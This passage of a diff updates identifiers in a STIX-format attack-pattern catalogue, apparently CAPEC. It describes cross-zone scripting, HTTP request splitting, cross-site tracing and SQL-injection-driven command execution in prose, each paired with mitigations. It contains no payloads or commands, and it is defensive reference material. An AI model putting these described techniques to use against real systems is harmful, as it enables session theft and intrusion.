on the server, while cross-zone scripting attacks the concept of security zones as implemented by a browser.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -1073,140 +1079,141 @@ "There was a cross zone scripting vulnerability discovered in Skype that allowed one user to upload a video with a maliciously crafted title that contains a script. Subsequently, when the victim attempts to use the \"add video to chat\" feature on attacker's video, the script embedded in the title of the video runs with local zone privileges. Skype is using IE web controls to render internal and external HTML pages. \"Add video to chat\" uses these web controls and they are running in the Local Zone. Any user who searched for the video in Skype with the same keywords as in the title field, would have the attackers' code executing in their browser with local zone privileges to their host machine (e.g. applications on the victim's host system could be executed)." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--2d5e2e57-4c8c-4fd1-be2d-19529e236863" + "id": "attack-pattern--5869bbce-1e2f-4f18-b5f0-34cc2fcc9b57" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-104-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Disable script execution.", "type": "course-of-action", - "id": "course-of-action--4a8c9c65-b39e-4d6a-b12b-90a03fed8a29" + "id": "course-of-action--7352da80-8df6-4540-bcaa-0b02c967b0a6" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--aa6949e3-a2e1-4bdf-a831-08eb3c1ea8fe", - "source_ref": "course-of-action--4a8c9c65-b39e-4d6a-b12b-90a03fed8a29", + "id": "relationship--93532399-3fea-4db4-9111-c588139409ff", + "source_ref": "course-of-action--7352da80-8df6-4540-bcaa-0b02c967b0a6", "relationship_type": "mitigates", - "target_ref": "attack-pattern--2d5e2e57-4c8c-4fd1-be2d-19529e236863" + "target_ref": "attack-pattern--5869bbce-1e2f-4f18-b5f0-34cc2fcc9b57" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-104-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Ensure that sufficient input validation is performed for any potentially untrusted data before it is used in any privileged context or zone", "type": "course-of-action", - "id": "course-of-action--82c7797b-3fb8-4a5d-99b2-46fd98327567" + "id": "course-of-action--b9d4b561-62fb-4fd0-b5a9-23d92cb484ae" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a5c5ea32-692a-4d7b-bde7-992a0178538f", - "source_ref": "course-of-action--82c7797b-3fb8-4a5d-99b2-46fd98327567", + "id": "relationship--f18a5424-9f62-4d5d-96d0-a4fe39121c41", + "source_ref": "course-of-action--b9d4b561-62fb-4fd0-b5a9-23d92cb484ae", "relationship_type": "mitigates", - "target_ref": "attack-pattern--2d5e2e57-4c8c-4fd1-be2d-19529e236863" + "target_ref": "attack-pattern--5869bbce-1e2f-4f18-b5f0-34cc2fcc9b57" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-104-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Limit the flow of untrusted data into the privileged areas of the system that run in the higher trust zone", "type": "course-of-action", - "id": "course-of-action--75860df8-47e9-4dd7-9f95-5a84bb9de601" + "id": "course-of-action--3b8e47a6-3169-4bd1-a564-746a25883ebf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--281de901-cb99-4992-87b8-3011945dcd0b", - "source_ref": "course-of-action--75860df8-47e9-4dd7-9f95-5a84bb9de601", + "id": "relationship--0e746897-8cb9-4202-bed5-27c2fcc346df", + "source_ref": "course-of-action--3b8e47a6-3169-4bd1-a564-746a25883ebf", "relationship_type": "mitigates", - "target_ref": "attack-pattern--2d5e2e57-4c8c-4fd1-be2d-19529e236863" + "target_ref": "attack-pattern--5869bbce-1e2f-4f18-b5f0-34cc2fcc9b57" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-104-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Limit the sites that are being added to the local machine zone and restrict the privileges of the code running in that zone to the bare minimum", "type": "course-of-action", - "id": "course-of-action--4879e785-8d06-4a18-8c88-3262050699e5" + "id": "course-of-action--a61b1090-6bb5-4c3c-9573-0f3734bd39bb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--6cd2f93d-3059-4abd-8321-09eeeeb823df", - "source_ref": "course-of-action--4879e785-8d06-4a18-8c88-3262050699e5", + "id": "relationship--46a94477-fcd6-438a-acc6-5f613e993979", + "source_ref": "course-of-action--a61b1090-6bb5-4c3c-9573-0f3734bd39bb", "relationship_type": "mitigates", - "target_ref": "attack-pattern--2d5e2e57-4c8c-4fd1-be2d-19529e236863" + "target_ref": "attack-pattern--5869bbce-1e2f-4f18-b5f0-34cc2fcc9b57" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-104-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Ensure proper HTML output encoding before writing user supplied data to the page", "type": "course-of-action", - "id": "course-of-action--3ef91d89-c359-400e-ba2e-2c6946fdbcb3" + "id": "course-of-action--f7b7948b-56c5-4b4c-bc36-db934b7ca567" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a6e82c1d-9671-4a85-a951-896ab7503193", - "source_ref": "course-of-action--3ef91d89-c359-400e-ba2e-2c6946fdbcb3", + "id": "relationship--110567ab-f53e-4f7e-ba84-08578ee941c8", + "source_ref": "course-of-action--f7b7948b-56c5-4b4c-bc36-db934b7ca567", "relationship_type": "mitigates", - "target_ref": "attack-pattern--2d5e2e57-4c8c-4fd1-be2d-19529e236863" + "target_ref": "attack-pattern--5869bbce-1e2f-4f18-b5f0-34cc2fcc9b57" }, { "name": "HTTP Request Splitting", "description": "HTTP Request Splitting (also known as HTTP Request Smuggling) is an attack pattern where an attacker attempts to insert additional HTTP requests in the body of the original (enveloping) HTTP request in such a way that the browser interprets it as one request but the web server interprets it as two. There are several ways to perform HTTP request splitting attacks. One way is to include double Content-Length headers in the request to exploit the fact that the devices parsing the request may each use a different header. Another way is to submit an HTTP request with a \"Transfer Encoding: chunked\" in the request header set with setRequestHeader to allow a payload in the HTTP Request that can be considered as another HTTP Request by a subsequent parsing entity. A third way is to use the \"Double CR in an HTTP header\" technique. There are also a few less general techniques targeting specific parsing vulnerabilities in certain web servers.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -1263,115 +1270,116 @@ "\n Microsoft Internet Explorer versions 5.01 SP4 and prior, 6.0 SP2 and prior, and 7.0 contain a vulnerability that could allow an unauthenticated, remote attacker to conduct HTTP request splitting and smuggling attacks.\n The vulnerability is due to an input validation error in the browser that allows attackers to manipulate certain headers to expose the browser to HTTP request splitting and smuggling attacks. Attacks may include cross-site scripting, proxy cache poisoning, and session fixation. In certain instances, an exploit could allow the attacker to bypass web application firewalls or other filtering devices.\n Microsoft has confirmed the vulnerability and released software updates\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--23f9c15f-3e94-4d91-8106-a0974d624568" + "id": "attack-pattern--86e31b64-8521-4fa2-ad2b-3ca2d036d398" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-105-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Make sure to install the latest vendor security patches available for the web server.", "type": "course-of-action", - "id": "course-of-action--0fc08cab-46af-4c8d-b14a-370582d932f1" + "id": "course-of-action--1dd51708-9b86-403a-8e0c-183605f1d327" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--9ef2395c-6d82-4f01-976e-c04cbd906ffa", - "source_ref": "course-of-action--0fc08cab-46af-4c8d-b14a-370582d932f1", + "id": "relationship--63134f93-a8ab-4f25-99e4-852f3bbdcfea", + "source_ref": "course-of-action--1dd51708-9b86-403a-8e0c-183605f1d327", "relationship_type": "mitigates", - "target_ref": "attack-pattern--23f9c15f-3e94-4d91-8106-a0974d624568" + "target_ref": "attack-pattern--86e31b64-8521-4fa2-ad2b-3ca2d036d398" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-105-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "If possible, make use of SSL.", "type": "course-of-action", - "id": "course-of-action--9ba06ea1-a493-48fb-a6e0-576a46467e4d" + "id": "course-of-action--108a12a8-aad4-460b-ba9c-77767c067d93" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f7af9114-1b45-48af-af4a-804dbd2147f5", - "source_ref": "course-of-action--9ba06ea1-a493-48fb-a6e0-576a46467e4d", + "id": "relationship--adc43532-79b6-4deb-98eb-2200ee6be8e5", + "source_ref": "course-of-action--108a12a8-aad4-460b-ba9c-77767c067d93", "relationship_type": "mitigates", - "target_ref": "attack-pattern--23f9c15f-3e94-4d91-8106-a0974d624568" + "target_ref": "attack-pattern--86e31b64-8521-4fa2-ad2b-3ca2d036d398" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-105-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Install a web application firewall that has been secured against HTTP Request Splitting", "type": "course-of-action", - "id": "course-of-action--a58db9a5-e355-4f35-ae9e-8bed69c7a99a" + "id": "course-of-action--31915125-c52a-4627-a701-7170b8709fbc" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--7d6c1a3a-5915-49df-87b1-14f8c1307975", - "source_ref": "course-of-action--a58db9a5-e355-4f35-ae9e-8bed69c7a99a", + "id": "relationship--62943b91-e6a3-4141-8467-b02dcb8536cc", + "source_ref": "course-of-action--31915125-c52a-4627-a701-7170b8709fbc", "relationship_type": "mitigates", - "target_ref": "attack-pattern--23f9c15f-3e94-4d91-8106-a0974d624568" + "target_ref": "attack-pattern--86e31b64-8521-4fa2-ad2b-3ca2d036d398" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-105-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use web servers that employ a tight HTTP parsing process", "type": "course-of-action", - "id": "course-of-action--38da739f-e263-40c4-9562-fa0a88995d0f" + "id": "course-of-action--e37545a6-d0e5-4e14-9145-0795cc3b9dec" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--074cbe80-2bbf-4b30-9530-80e2ebda6bfb", - "source_ref": "course-of-action--38da739f-e263-40c4-9562-fa0a88995d0f", + "id": "relationship--9bd389e5-7353-481d-a15f-0dd86ff65e04", + "source_ref": "course-of-action--e37545a6-d0e5-4e14-9145-0795cc3b9dec", "relationship_type": "mitigates", - "target_ref": "attack-pattern--23f9c15f-3e94-4d91-8106-a0974d624568" + "target_ref": "attack-pattern--86e31b64-8521-4fa2-ad2b-3ca2d036d398" }, { "name": "DEPRECATED: XSS through Log Files", "description": "This attack pattern has been deprecated as it referes to an existing chain relationship between \"CAPEC-93 : Log Injection-Tampering-Forging\" and \"CAPEC-63 : Cross-Site Scripting\". Please refer to these CAPECs going forward.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", @@ -1384,15 +1392,16 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Deprecated", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--59ae8030-8c12-400a-8cef-d7b335a2ed80" + "id": "attack-pattern--d08922ff-2566-4d0d-a098-3dfffaea3331" }, { "name": "Cross Site Tracing", "description": "Cross Site Tracing (XST) enables an adversary to steal the victim's session cookie and possibly other authentication credentials transmitted in the header of the HTTP request when the victim's browser communicates to destination system's web server. The adversary first gets a malicious script to run in the victim's browser that induces the browser to initiate an HTTP TRACE request to the web server. If the destination web server allows HTTP TRACE requests, it will proceed to return a response to the victim's web browser that contains the original HTTP request in its body. The function of HTTP TRACE, as defined by the HTTP specification, is to echo the request that the web server receives from the client back to the client. Since the HTTP header of the original request had the victim's session cookie in it, that session cookie can now be picked off the HTTP TRACE response and sent to the adversary's malicious site. XST becomes relevant when direct access to the session cookie via the \"document.cookie\" object is disabled with the use of httpOnly attribute which ensures that the cookie can be transmitted in HTTP requests but cannot be accessed in other ways. Using SSL does not protect against XST. If the system with which the victim is interacting is susceptible to XSS, an adversary can exploit that weakness directly to get his or her malicious script to issue an HTTP TRACE request to the destination system's web server. In the absence of an XSS weakness on the site with which the victim is interacting, an adversary can get the script to come from the site that he controls and get it to execute in the victim's browser (if he can trick the victim's into visiting his malicious website or clicking on the link that he supplies). However, in that case, due to the same origin policy protection mechanism in the browser, the adversary's malicious script cannot directly issue an HTTP TRACE request to the destination system's web server because the malicious script did not originate at that domain. An adversary will then need to find a way to exploit another weakness that would enable him or her to get around the same origin policy protection.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -1453,65 +1462,66 @@ "An adversary determines that a particular system is vulnerable to reflected cross-site scripting (XSS) and endeavors to leverage this weakness to steal the victim's authentication cookie. An adversary realizes that since httpOnly attribute is set on the user's cookie, it is not possible to steal it directly with his malicious script. Instead, the adversary has their script use XMLHTTP ActiveX control in the victim's IE browser to issue an HTTP TRACE to the target system's server which has HTTP TRACE enabled. The original HTTP TRACE request contains the session cookie and so does the echoed response. The adversary picks the session cookie from the body of HTTP TRACE response and ships it to the adversary. The adversary then uses the newly acquired victim's session cookie to impersonate the victim in the target system." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--3e1631f7-a29d-4430-a035-31c9604f5ffc" + "id": "attack-pattern--058622b3-81cb-403b-9169-404832c7afaf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-107-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Administrators should disable support for HTTP TRACE at the destination's web server. Vendors should disable TRACE by default.", "type": "course-of-action", - "id": "course-of-action--4781b274-85af-484d-9181-389d49a3264e" + "id": "course-of-action--f4ab1297-f95e-461d-83c8-7238df98791d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--87209cbf-8fee-4f95-9c1b-f57fcca81951", - "source_ref": "course-of-action--4781b274-85af-484d-9181-389d49a3264e", + "id": "relationship--d69e0751-1feb-4f2b-9ade-3cbd0a54df58", + "source_ref": "course-of-action--f4ab1297-f95e-461d-83c8-7238df98791d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--3e1631f7-a29d-4430-a035-31c9604f5ffc" + "target_ref": "attack-pattern--058622b3-81cb-403b-9169-404832c7afaf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-107-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Patch web browser against known security origin policy bypass exploits.", "type": "course-of-action", - "id": "course-of-action--53d85cda-94f8-489d-ae38-f5a7e8c80612" + "id": "course-of-action--b302b0b6-167c-4501-a44c-0e0087f9e946" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--392bf4cd-96f8-4d5a-82af-b1ae45cd613b", - "source_ref": "course-of-action--53d85cda-94f8-489d-ae38-f5a7e8c80612", + "id": "relationship--346d9661-926f-445d-b7e3-e41c8754c75e", + "source_ref": "course-of-action--b302b0b6-167c-4501-a44c-0e0087f9e946", "relationship_type": "mitigates", - "target_ref": "attack-pattern--3e1631f7-a29d-4430-a035-31c9604f5ffc" + "target_ref": "attack-pattern--058622b3-81cb-403b-9169-404832c7afaf" }, { "name": "Command Line Execution through SQL Injection", "description": "An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -1586,90 +1596,91 @@ "\n SQL injection vulnerability in Cacti 0.8.6i and earlier, when register_argc_argv is enabled, allows remote attackers to execute arbitrary SQL commands via the (1) second or (2) third arguments to cmd.php. NOTE: this issue can be leveraged to execute arbitrary commands since the SQL query results are later used in the polling_items array and popen function (CVE-2006-6799).\n Reference: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6799\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--6402f030-9e5f-48fb-b4ce-836e9a0d81b9" + "id": "attack-pattern--9e9ffae0-b1d1-4680-b729-8c2b7677d2f6" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-108-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Disable MSSQL xp_cmdshell directive on the database", "type": "course-of-action", - "id": "course-of-action--673d3aed-90a8-4b44-bd3f-23298ac3df35" + "id": "course-of-action--557e63a0-6f2a-4ffd-baf2-a6dc676a7156" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--7c14ea0e-e88d-4357-b1ae-4a5e1d14a182", - "source_ref": "course-of-action--673d3aed-90a8-4b44-bd3f-23298ac3df35", + "id": "relationship--b8d0a57a-7ab7-4d6c-9f1b-77b16561a7db", + "source_ref": "course-of-action--557e63a0-6f2a-4ffd-baf2-a6dc676a7156", "relationship_type": "mitigates", - "target_ref": "attack-pattern--6402f030-9e5f-48fb-b4ce-836e9a0d81b9" + "target_ref": "attack-pattern--9e9ffae0-b1d1-4680-b729-8c2b7677d2f6" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-108-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Properly validate the data (syntactically and semantically) before writing it to the database.", "type": "course-of-action", - "id": "course-of-action--97d89651-0578-4bdf-b88d-06f2a1ad6bfc" + "id": "course-of-action--b6192d22-5e14-40ee-9840-023bb3eb017d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f5c1756c-6373-43d7-a651-fda085beb410", - "source_ref": "course-of-action--97d89651-0578-4bdf-b88d-06f2a1ad6bfc", + "id": "relationship--56365a37-e65d-4bea-ba0d-d078e1ac103f", + "source_ref": "course-of-action--b6192d22-5e14-40ee-9840-023bb3eb017d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--6402f030-9e5f-48fb-b4ce-836e9a0d81b9" + "target_ref": "attack-pattern--9e9ffae0-b1d1-4680-b729-8c2b7677d2f6" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-108-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Do not implicitly trust the data stored in the database. Re-validate it prior to usage to make sure that it is safe to use in a given context (e.g. as a command line argument).", "type": "course-of-action", - "id": "course-of-action--8c631216-9bdf-451b-a95e-3b2cf7528a8c" + "id": "course-of-action--53739b65-3b71-4ed3-b31a-28ab1b090551" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3abeddeb-c878-48a8-8134-2a2286630211", - "source_ref": "course-of-action--8c631216-9bdf-451b-a95e-3b2cf7528a8c", + "id": 